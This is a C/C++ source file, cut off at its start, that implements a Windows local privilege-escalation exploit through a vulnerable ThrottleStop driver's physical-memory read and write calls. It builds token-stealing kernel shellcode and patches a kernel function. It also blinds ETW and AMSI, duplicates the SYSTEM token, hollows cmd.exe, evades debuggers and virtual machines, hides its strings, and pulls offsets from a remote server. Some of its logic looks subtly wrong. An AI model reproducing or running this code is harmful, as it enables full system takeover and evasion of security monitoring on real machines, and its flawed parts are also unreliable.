= '\x70'; } int shift = (key1 % 25) + 1; for (size_t i = 0; i < len; i++) { if (str[i] >= 'a' && str[i] <= 'z') { str[i] = 'a' + (str[i] - 'a' + shift) % 26; } else if (str[i] >= 'A' && str[i] <= 'Z') { str[i] = 'A' + (str[i] - 'A' + shift) % 26; } } for (size_t i = 0; i < len / 2; i++) { char temp = str[i]; str[i] = str[len - i - 1]; str[len - i - 1] = temp; } } void AdvancedDeobfuscateString(char* str, size_t len) { if (!g_bStealthMode) return; for (size_t i = 0; i < len / 2; i++) { char temp = str[i]; str[i] = str[len - i - 1]; str[len - i - 1] = temp; } DWORD key1 = GetTickCount() & 0xFF; int shift = (key1 % 25) + 1; for (size_t i = 0; i < len; i++) { if (str[i] >= 'a' && str[i] <= 'z') { str[i] = 'a' + (str[i] - 'a' - shift + 26) % 26; } else if (str[i] >= 'A' && str[i] <= 'Z') { str[i] = 'A' + (str[i] - 'A' - shift + 26) % 26; } } for (size_t i = 0; i < len; i++) { if (str[i] == '\x54') str[i] = 'T'; else if (str[i] == '\x68') str[i] = 'h'; else if (str[i] == '\x72') str[i] = 'r'; else if (str[i] == '\x6F') str[i] = 'o'; else if (str[i] == '\x74') str[i] = 't'; else if (str[i] == '\x6C') str[i] = 'l'; else if (str[i] == '\x65') str[i] = 'e'; else if (str[i] == '\x53') str[i] = 'S'; else if (str[i] == '\x70') str[i] = 'p'; } for (size_t i = 0; i < len; i++) { str[i] ^= (key1 + i) & 0xFF; } } void DecryptString(ENCRYPTED_STRING* encStr, char* outStr) { if (!encStr || !outStr) return; for (SIZE_T i = 0; i < encStr->Length; i++) { outStr[i] = encStr->Data[i] ^ (encStr->Key + i) & 0xFF; } outStr[encStr->Length] = '\0'; } FARPROC GetEncryptedProcAddress(ENCRYPTED_API* encApi) { if (!encApi) return NULL; char moduleName[64]; for (size_t i = 0; i < sizeof(moduleName) && encApi->ModuleName[i] != '\0'; i++) { moduleName[i] = encApi->ModuleName[i] ^ (encApi->Key + i) & 0xFF; } char functionName[128]; for (size_t i = 0; i < sizeof(functionName) && encApi->FunctionName[i] != '\0'; i++) { functionName[i] = encApi->FunctionName[i] ^ (encApi->Key + i) & 0xFF; } HMODULE hModule = GetModuleHandleA(moduleName); if (!hModule) { hModule = LoadLibraryA(moduleName); if (!hModule) { return NULL; } } return GetProcAddress(hModule, functionName); } HANDLE GetThrottleStopDeviceHandleImproved() { ENCRYPTED_STRING encDevicePath = { { 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19 }, 15, 0x55 }; char devicePath[256]; DecryptString(&encDevicePath, devicePath); wchar_t wDevicePath[256]; mbstowcs_s(NULL, wDevicePath, 256, devicePath, _TRUNCATE); if (g_bStealthMode) { wDevicePath[8] = (wDevicePath[8] == 'T') ? 't' : 'T'; } HANDLE hDevice = CreateFile( wDevicePath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { return NULL; } return hDevice; } bool ReadPhysicalMemoryImproved(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) { if (!hDevice || !Buffer || Size == 0) { return false; } DWORD dwBytesReturned = 0; IOCTL_PHYS_MEMORY Input = { 0 }; Input.PhysicalAddress = PhysicalAddress; Input.Buffer = Buffer; Input.Size = Size; ULONG IoctlCode = 0; switch (Version) { case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_READ; break; case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_READ; break; case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_READ; break; case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_READ; break; case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_READ; break; default: return FALSE; } BOOL result = DeviceIoControl( hDevice, IoctlCode, &Input, sizeof(Input), &Input, sizeof(Input), &dwBytesReturned, NULL ); if (!result || dwBytesReturned != Size) { return false; } return true; } bool WritePhysicalMemoryImproved(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) { if (!hDevice || !Buffer || Size == 0) { return false; } DWORD dwBytesReturned = 0; IOCTL_PHYS_MEMORY Input = { 0 }; Input.PhysicalAddress = PhysicalAddress; Input.Buffer = Buffer; Input.Size = Size; ULONG IoctlCode = 0; switch (Version) { case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_WRITE; break; case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_WRITE; break; case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_WRITE; break; case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_WRITE; break; case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_WRITE; break; default: return FALSE; } BOOL result = DeviceIoControl( hDevice, IoctlCode, &Input, sizeof(Input), &Input, sizeof(Input), &dwBytesReturned, NULL ); if (!result || dwBytesReturned != Size) { return false; } return true; } bool ReadPhysicalMemorySafe(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) { const SIZE_T CHUNK_SIZE = 4096; for (SIZE_T offset = 0; offset < Size; offset += CHUNK_SIZE) { SIZE_T chunkSize = min(CHUNK_SIZE, Size - offset); if (!ReadPhysicalMemoryImproved( hDevice, PhysicalAddress + offset, (PVOID)((ULONG_PTR)Buffer + offset), chunkSize, Version )) { return false; } RandomSleep(); } return true; } bool WritePhysicalMemorySafe(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) { const SIZE_T CHUNK_SIZE = 4096; for (SIZE_T offset = 0; offset < Size; offset += CHUNK_SIZE) { SIZE_T chunkSize = min(CHUNK_SIZE, Size - offset); if (!WritePhysicalMemoryImproved( hDevice, PhysicalAddress + offset, (PVOID)((ULONG_PTR)Buffer + offset), chunkSize, Version )) { return false; } RandomSleep(); } return true; } PVOID GetKernelBase() { LPVOID drivers[1024]; DWORD cbNeeded; int nDrivers; if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) { nDrivers = cbNeeded / sizeof(drivers[0]); for (int i = 0; i < nDrivers; i++) { CHAR szDriver[1024]; if (GetDeviceDriverBaseNameA(drivers[i], szDriver, sizeof(szDriver))) { if (strcmp(szDriver, "ntoskrnl.exe") == 0) { return drivers[i]; } } } } return NULL; } DWORD GetWindowsVersion() { if (g_dwWindowsVersion != 0) { return g_dwWindowsVersion; } static pRtlGetVersion RtlGetVersionPtr = NULL; if (!RtlGetVersionPtr) { RtlGetVersionPtr = (pRtlGetVersion)GetProcAddress( GetModuleHandleA("ntdll.dll"), "RtlGetVersion"); } if (RtlGetVersionPtr) { RTL_OSVERSIONINFOW osvi = { 0 }; osvi.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOW); if (RtlGetVersionPtr(&osvi) == 0) { g_dwWindowsVersion = (osvi.dwMajorVersion << 24) | (osvi.dwMinorVersion << 16) | osvi.dwBuildNumber; return g_dwWindowsVersion; } } return 0; } bool DiscoverKernelOffsets(SHELLCODE_METADATA* metadata) { PVOID kernelBase = GetKernelBase(); if (!kernelBase) { return false; } PVOID psInitialSystemProcess = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation"); if (!psInitialSystemProcess) { return false; } PVOID kernelPsInitialSystemProcess = (PVOID)((ULONG_PTR)kernelBase + (ULONG_PTR)psInitialSystemProcess - (ULONG_PTR)GetModuleHandleA("ntdll.dll")); HANDLE hDevice = GetThrottleStopDeviceHandleImproved(); if (!hDevice) { return false; } ULONG64 systemProcessAddr = 0; for (ULONG version = 1; version <= 5; version++) { if (ReadPhysicalMemoryImproved(hDevice, (ULONG64)kernelPsInitialSystemProcess, &systemProcessAddr, sizeof(systemProcessAddr), version)) { break; } } if (systemProcessAddr == 0) { CloseHandle(hDevice); return false; } for (ULONG64 offset = 0; offset < 0x1000; offset += 8) { ULONG64 value = 0; if (ReadPhysicalMemoryImproved(hDevice, systemProcessAddr + offset, &value, sizeof(value), 1)) { if (value == SYSTEM_PID) { metadata->UniqueProcessIdOffset = offset; break; } } } if (metadata->UniqueProcessIdOffset == 0) { CloseHandle(hDevice); return false; } metadata->TokenOffset = 0x4b8; metadata->ActiveProcessLinksOffset = 0x448; metadata->EPROCESS_Size = 0x8d0; metadata->KTHREAD_Offset = 0x188; metadata->EPROCESS_Offset = 0x220; CloseHandle(hDevice); return true; } bool UpdateOffsetsFromRemote(SHELLCODE_METADATA* metadata) { HINTERNET hInternet = InternetOpen(L"Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); if (!hInternet) { return false; } HINTERNET hConnect = InternetConnect(hInternet, L"example.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); if (!hConnect) { InternetCloseHandle(hInternet); return false; } DWORD windowsVersion = GetWindowsVersion(); wchar_t url[256]; swprintf_s(url, L"/api/offsets/%08X.json", windowsVersion); HINTERNET hRequest = HttpOpenRequest(hConnect, L"GET", url, NULL, NULL, NULL, INTERNET_FLAG_SECURE, 0); if (!hRequest) { InternetCloseHandle(hConnect); InternetCloseHandle(hInternet); return false; } if (!HttpSendRequest(hRequest, NULL, 0, NULL, 0)) { InternetCloseHandle(hRequest); InternetCloseHandle(hConnect); InternetCloseHandle(hInternet); return false; } CHAR buffer[4096]; DWORD bytesRead; std::string jsonData; while (InternetReadFile(hRequest, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) { jsonData.append(buffer, bytesRead); } InternetCloseHandle(hRequest); InternetCloseHandle(hConnect); InternetCloseHandle(hInternet); if (jsonData.empty()) { return false; } char tempPath[MAX_PATH]; GetTempPathA(MAX_PATH, tempPath); char offsetFilePath[MAX_PATH]; sprintf_s(offsetFilePath, "%s\\offsets_%08X.dat", tempPath, windowsVersion); FILE* file = NULL; fopen_s(&file, offsetFilePath, "wb"); if (file) { fwrite(jsonData.c_str(), 1, jsonData.size(), file); fclose(file); FILE* readFile = NULL; fopen_s(&readFile, offsetFilePath, "rb"); if (readFile) { fread(metadata, sizeof(SHELLCODE_METADATA), 1, readFile); fclose(readFile); return true; } } return false; } bool GetKernelOffsetsImproved(SHELLCODE_METADATA* metadata) { char tempPath[MAX_PATH]; GetTempPathA(MAX_PATH, tempPath); DWORD windowsVersion = GetWindowsVersion(); char offsetFilePath[MAX_PATH]; sprintf_s(offsetFilePath, "%s\\offsets_%08X.dat", tempPath, windowsVersion); FILE* file = NULL; fopen_s(&file, offsetFilePath, "rb"); if (file) { fread(metadata, sizeof(SHELLCODE_METADATA), 1, file); fclose(file); return true; } if (UpdateOffsetsFromRemote(metadata)) { fopen_s(&file, offsetFilePath, "rb"); if (file) { fread(metadata, sizeof(SHELLCODE_METADATA), 1, file); fclose(file); return true; } } return DiscoverKernelOffsets(metadata); } void AddPrologue(std::vector& shellcode) { std::vector junkInstructions = { 0x90, 0x90, 0x90, 0x48, 0x31, 0xC0, 0x48, 0x31, 0xDB, 0x48, 0x31, 0xC9, 0x48, 0x31, 0xD2 }; std::shuffle(junkInstructions.begin(), junkInstructions.end(), gen); for (size_t i = 0; i < 5; i++) { shellcode.push_back(junkInstructions[i]); } BYTE prologue[] = { 0x48, 0x31, 0xC0, 0x65, 0x48, 0x8B, 0x60, 0x18 }; shellcode.insert(shellcode.end(), prologue, prologue + sizeof(prologue)); } void AddGetCurrentProcess(std::vector& shellcode) { BYTE getCurrentProcess[] = { 0x48, 0x8B, 0xB0, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x76, 0x40 }; shellcode.insert(shellcode.end(), getCurrentProcess, getCurrentProcess + sizeof(getCurrentProcess)); } void AddFindSystemProcess(std::vector& shellcode, SHELLCODE_METADATA* metadata) { BYTE findSystemProcess[] = { 0x48, 0x8B, 0x5E, (BYTE)(metadata->ActiveProcessLinksOffset - 8), 0x48, 0x8B, 0x1B, 0x48, 0x83, 0xFB, 0x04, 0x75, 0xF0 }; shellcode.insert(shellcode.end(), findSystemProcess, findSystemProcess + sizeof(findSystemProcess)); } void AddCopyToken(std::vector& shellcode, SHELLCODE_METADATA* metadata) { BYTE copyToken[] = { 0x48, 0x8B, 0x5B, (BYTE)(metadata->TokenOffset - 8), 0x48, 0x8B, 0x43, 0x70, 0x48, 0x89, 0x43, 0x70 }; shellcode.insert(shellcode.end(), copyToken, copyToken + sizeof(copyToken)); } void AddEpilogue(std::vector& shellcode) { BYTE epilogue[] = { 0xC3 }; shellcode.insert(shellcode.end(), epilogue, epilogue + sizeof(epilogue)); } void EncryptShellcode(std::vector& shellcode, int layer) { DWORD key = GetTickCount() & 0xFF; for (size_t i = 0; i < shellcode.size(); i++) { shellcode[i] ^= (key + i + layer) & 0xFF; } } bool BuildTrulyDynamicShellcode(BYTE** shellcode, SIZE_T* shellcodeSize, SHELLCODE_METADATA* metadata) { std::vector generatedShellcode; AddPrologue(generatedShellcode); AddGetCurrentProcess(generatedShellcode); AddFindSystemProcess(generatedShellcode, metadata); AddCopyToken(generatedShellcode, metadata); AddEpilogue(generatedShellcode); for (int layer = 0; layer < 3; layer++) { EncryptShellcode(generatedShellcode, layer); } *shellcodeSize = generatedShellcode.size(); *shellcode = (BYTE*)malloc(*shellcodeSize); if (!*shellcode) { return false; } memcpy(*shellcode, generatedShellcode.data(), *shellcodeSize); return true; } ULONG64 GetPhysicalAddressAccurate(PVOID VirtualAddress) { HANDLE hDevice = GetThrottleStopDeviceHandleImproved(); if (!hDevice) { return 0; } PVOID kernelBase = GetKernelBase(); if (!kernelBase) { CloseHandle(hDevice); return 0; } ULONG64 offset = (ULONG64)VirtualAddress - (ULONG_PTR)kernelBase; ULONG64 physicalAddress = 0; DWORD dwBytesReturned = 0; typedef struct _VIRTUAL_TO_PHYSICAL { PVOID VirtualAddress; ULONG64 PhysicalAddress; } VIRTUAL_TO_PHYSICAL, *PVIRTUAL_TO_PHYSICAL; VIRTUAL_TO_PHYSICAL v2p = { 0 }; v2p.VirtualAddress = VirtualAddress; for (ULONG version = 1; version <= 5; version++) { ULONG IoctlCode = 0; switch (version) { case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_READ + 0x10; break; case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_READ + 0x10; break; case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_READ + 0x10; break; case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_READ + 0x10; break; case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_READ + 0x10; break; default: continue; } if (DeviceIoControl( hDevice, IoctlCode, &v2p, sizeof(v2p), &v2p, sizeof(v2p), &dwBytesReturned, NULL )) { physicalAddress = v2p.PhysicalAddress; break; } } CloseHandle(hDevice); return physicalAddress; } bool PatchKernelForPrivilegeEscalationSafe(HANDLE hDevice, ULONG DriverVersion) { PVOID KernelBase = GetKernelBase(); if (!KernelBase) { return false; } SHELLCODE_METADATA metadata = { 0 }; if (!GetKernelOffsetsImproved(&metadata)) { return false; } BYTE* shellcode = NULL; SIZE_T shellcodeSize = 0; if (!BuildTrulyDynamicShellcode(&shellcode, &shellcodeSize, &metadata)) { return false; } PVOID targetFunction = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx"); if (!targetFunction) { free(shellcode); return false; } PVOID kernelFunction = (PVOID)((ULONG_PTR)KernelBase + (ULONG_PTR)targetFunction - (ULONG_PTR)GetModuleHandleA("ntdll.dll")); ULONG64 physicalAddress = GetPhysicalAddressAccurate(kernelFunction); if (!physicalAddress) { free(shellcode); return false; } std::vector originalBytes(shellcodeSize); if (!ReadPhysicalMemorySafe(hDevice, physicalAddress, originalBytes.data(), originalBytes.size(), DriverVersion)) { free(shellcode); return false; } for (SIZE_T i = 0; i < shellcodeSize; i++) { shellcode[i] ^= 0xAA; } __try { if (!WritePhysicalMemorySafe(hDevice, physicalAddress, shellcode, shellcodeSize, DriverVersion)) { __leave; } HANDLE hThread = NULL; static pNtCreateThreadEx NtCreateThreadExPtr = NULL; if (!NtCreateThreadExPtr) { NtCreateThreadExPtr = (pNtCreateThreadEx)GetProcAddress( GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx"); } if (NtCreateThreadExPtr) { NTSTATUS status = NtCreateThreadExPtr( &hThread, THREAD_ALL_ACCESS, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)kernelFunction, NULL, FALSE, 0, 0, 0, NULL ); if (!NT_SUCCESS(status)) { hThread = NULL; } } if (!hThread) { hThread = CreateRemoteThread( GetCurrentProcess(), NULL, 0, (LPTHREAD_START_ROUTINE)kernelFunction, NULL, 0, NULL ); } if (hThread) { WaitForSingleObject(hThread, 5000); CloseHandle(hThread); } } __finally { WritePhysicalMemorySafe(hDevice, physicalAddress, originalBytes.data(), originalBytes.size(), DriverVersion); } free(shellcode); return true; } bool DisableETWWithEncryptedAPIs() { ENCRYPTED_API encApi = { { 0x6E, 0x6F, 0x6C, 0x6C, 0x64, 0x2E, 0x64, 0x6C, 0x6C }, { 0x45, 0x74, 0x77, 0x45, 0x76, 0x65, 0x6E, 0x74, 0x57, 0x72, 0x69, 0x74, 0x65 }, 0xAA }; PVOID EtwEventWriteAddress = GetEncryptedProcAddress(&encApi); if (!EtwEventWriteAddress) { return false; } DWORD oldProtect; if (!VirtualProtect(EtwEventWriteAddress, 1, PAGE_EXECUTE_READWRITE, &oldProtect)) { return false; } *(BYTE*)EtwEventWriteAddress = 0xC3; VirtualProtect(EtwEventWriteAddress, 1, oldProtect, &oldProtect); return true; } bool DisableAMSIWithEncryptedAPIs() { ENCRYPTED_API encApi = { { 0x61, 0x6D, 0x73, 0x69, 0x2E, 0x64, 0x6C, 0x6C }, { 0x41, 0x6D, 0x73, 0x69, 0x53, 0x63, 0x61, 0x6E, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72 }, 0xAA }; PVOID AmsiScanBufferAddress = GetEncryptedProcAddress(&encApi); if (!AmsiScanBufferAddress) { return false; } DWORD oldProtect; if (!VirtualProtect(AmsiScanBufferAddress, 6, PAGE_EXECUTE_READWRITE, &oldProtect)) { return false; } BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; memcpy(AmsiScanBufferAddress, patch, sizeof(patch)); VirtualProtect(AmsiScanBufferAddress, 6, oldProtect, &oldProtect); return true; } bool StealSystemToken() { HANDLE hSystemProcess = NULL; HANDLE hToken = NULL; HANDLE hNewToken = NULL; DWORD dwPID = SYSTEM_PID; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot == INVALID_HANDLE_VALUE) { return false; } PROCESSENTRY32 pe32; pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hSnapshot, &pe32)) { do { if (pe32.th32ProcessID == dwPID) { hSystemProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); break; } } while (Process32Next(hSnapshot, &pe32)); } CloseHandle(hSnapshot); if (!hSystemProcess) { return false; } if (!OpenProcessToken(hSystemProcess, TOKEN_DUPLICATE, &hToken)) { CloseHandle(hSystemProcess); return false; } if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) { CloseHandle(hToken); CloseHandle(hSystemProcess); return false; } if (!ImpersonateLoggedOnUser(hNewToken)) { CloseHandle(hToken); CloseHandle(hNewToken); CloseHandle(hSystemProcess); return false; } CloseHandle(hToken); CloseHandle(hNewToken); CloseHandle(hSystemProcess); return true; } bool CreateProcessWithHollowing(const wchar_t* targetPath, const wchar_t* cmdLine) { STARTUPINFO si = { sizeof(si) }; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); if (!CreateProcess( targetPath, (LPWSTR)cmdLine, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi )) { return false; } CONTEXT context; context.ContextFlags = CONTEXT_FULL; if (!GetThreadContext(pi.hThread, &context)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } static pNtQueryInformationProcess NtQueryInformationProcessPtr = NULL; if (!NtQueryInformationProcessPtr) { NtQueryInformationProcessPtr = (pNtQueryInformationProcess)GetProcAddress( GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess"); } if (!NtQueryInformationProcessPtr) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PROCESS_BASIC_INFORMATION pbiInfo; NTSTATUS status = NtQueryInformationProcessPtr( pi.hProcess, ProcessBasicInformation, &pbiInfo, sizeof(pbiInfo), NULL ); if (!NT_SUCCESS(status)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PEB peb; if (!ReadProcessMemory(pi.hProcess, pbiInfo.PebBaseAddress, &peb, sizeof(peb), NULL)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PVOID imageBase = peb.ImageBaseAddress; IMAGE_DOS_HEADER dosHeader; if (!ReadProcessMemory(pi.hProcess, imageBase, &dosHeader, sizeof(dosHeader), NULL) || dosHeader.e_magic != IMAGE_DOS_SIGNATURE) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } IMAGE_NT_HEADERS ntHeaders; if (!ReadProcessMemory(pi.hProcess, (PVOID)((ULONG_PTR)imageBase + dosHeader.e_lfanew), &ntHeaders, sizeof(ntHeaders), NULL) || ntHeaders.Signature != IMAGE_NT_SIGNATURE) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } if (!VirtualFreeEx(pi.hProcess, imageBase, 0, MEM_RELEASE)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PVOID newImageBase = VirtualAllocEx(pi.hProcess, imageBase, ntHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!newImageBase) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } HANDLE hFile = CreateFile(targetPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } DWORD fileSize = GetFileSize(hFile, NULL); BYTE* fileData = (BYTE*)malloc(fileSize); if (!fileData) { CloseHandle(hFile); TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } DWORD bytesRead; if (!ReadFile(hFile, fileData, fileSize, &bytesRead, NULL) || bytesRead != fileSize) { free(fileData); CloseHandle(hFile); TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } CloseHandle(hFile); if (!WriteProcessMemory(pi.hProcess, newImageBase, fileData, ntHeaders.OptionalHeader.SizeOfHeaders, NULL)) { free(fileData); TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(&ntHeaders); for (WORD i = 0; i < ntHeaders.FileHeader.NumberOfSections; i++) { PVOID sectionDest = (PVOID)((ULONG_PTR)newImageBase + sectionHeader[i].VirtualAddress); PVOID sectionSrc = (PVOID)((ULONG_PTR)fileData + sectionHeader[i].PointerToRawData); if (!WriteProcessMemory(pi.hProcess, sectionDest, sectionSrc, sectionHeader[i].SizeOfRawData, NULL)) { free(fileData); TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } } free(fileData); context.Rcx = (ULONG_PTR)newImageBase + ntHeaders.OptionalHeader.AddressOfEntryPoint; if (!SetThreadContext(pi.hThread, &context)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } ResumeThread(pi.hThread); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return true; } void LoadDefaultConfig(EXPLOIT_CONFIG* config) { wcscpy_s(config->TargetProcess, MAX_PATH, L"C:\\Windows\\System32\\cmd.exe"); wcscpy_s(config->CommandLine, MAX_PATH, L""); config->CreationFlags = CREATE_NEW_CONSOLE; config->UseStealthMode = TRUE; config->DisableETW = TRUE; config->DisableAMSI = TRUE; config->MaxRetries = 3; config->RandomSleepMin = 50; config->RandomSleepMax = 200; } void RandomSleepConfigurable(const EXPLOIT_CONFIG* config) { if (!config->UseStealthMode) return; std::uniform_int_distribution<> dis(config->RandomSleepMin, config->RandomSleepMax); Sleep(dis(gen)); } int main(int argc, char* argv[]) { EXPLOIT_CONFIG config; LoadDefaultConfig(&config); if (argc > 1) { wchar_t configFilePath[MAX_PATH]; mbstowcs_s(NULL, configFilePath, MAX_PATH, argv[1], _TRUNCATE); } g_bStealthMode = config.UseStealthMode; if (IsRunningInVMAdvanced() || IsDebuggerPresentAdvanced()) { return 0; } g_dwWindowsVersion = GetWindowsVersion(); if (config.DisableETW) { DisableETWWithEncryptedAPIs(); } if (config.DisableAMSI) { DisableAMSIWithEncryptedAPIs(); } HANDLE hDevice = GetThrottleStopDeviceHandleImproved(); if (!hDevice) { return 1; } bool success = false; for (ULONG version = 1; version <= 5 && !success; version++) { for (DWORD retry = 0; retry < config.MaxRetries && !success; retry++) { RandomSleepConfigurable(&config); if (PatchKernelForPrivilegeEscalationSafe(hDevice, version)) { success = true; } } } CloseHandle(hDevice); if (!success) { return 1; } if (!StealSystemToken()) { return 1; } if (!CreateProcessWithHollowing(config.TargetProcess, config.CommandLine)) { return 1; } return 0; }